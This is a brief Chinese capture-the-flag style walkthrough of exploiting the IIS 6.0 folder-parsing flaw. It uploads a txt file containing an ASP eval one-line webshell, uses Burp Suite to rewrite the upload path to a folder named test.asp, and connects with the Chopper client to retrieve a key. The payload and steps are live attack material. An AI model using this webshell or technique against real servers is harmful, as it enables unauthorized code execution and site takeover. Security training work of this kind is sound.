利用IIS6.0漏洞,即建立*.asp文件夹,其中的文件都会解析成为asp文件。
1.如题,测试可上传文件类型,发现可以上传txt文件
2.在txt文件中构造asp一句话:<%eval request("pass")%>并上传
3.使用BrupSuite修改上传的文件夹,即
Content-Disposition:form-data;name=”path”下面的一行为服务保存文件的相对路径,我们把原本的upload修改为test.asp然后跑起来
4.在上传成功页面得到路径,这是菜刀连接时候所需要的路径
5.菜刀连接,得到KEY